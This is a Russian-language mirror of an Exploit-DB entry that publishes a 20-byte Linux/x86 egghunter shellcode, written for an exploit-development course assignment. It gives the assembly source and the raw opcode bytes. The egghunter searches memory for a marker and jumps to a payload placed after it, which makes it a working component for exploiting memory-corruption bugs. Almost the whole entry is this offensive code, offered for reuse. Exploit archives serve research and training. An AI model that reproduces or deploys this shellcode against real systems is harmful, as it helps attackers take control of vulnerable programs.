- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36672
- Проверка EDB
-
- Пройдено
- Автор
- PAW PETERSEN
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2015-04-08
Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)
Код:
; Egg Hunter (20 bytes)
; - searches from current addr towards lower memory
; - marker: 0x5159 (push ecx,pop ecx)
; Paw Petersen, SLAE-656
; https://www.pawpetersen.dk/slae-assignment-3-egg-hunter-linux-x86/
global _start
section .text
_start:
jmp call_egghunter
egghunter:
pop ecx ; save addr ptr
sub ecx, 23 ; move addr ptr back
next:
cmp word [ecx], 0x5951 ; marker
loopnz next ; dec ecx, jump
jmp ecx ; jump to shellcode
call_egghunter:
call egghunter
; "\xeb\x0d\x59\x83\xe9\x17\x66\x81\x39\x51\x59\xe0"
; ”\xf9\xff\xe1\xe8\xee\xff\xff\xff"- Источник
- www.exploit-db.com
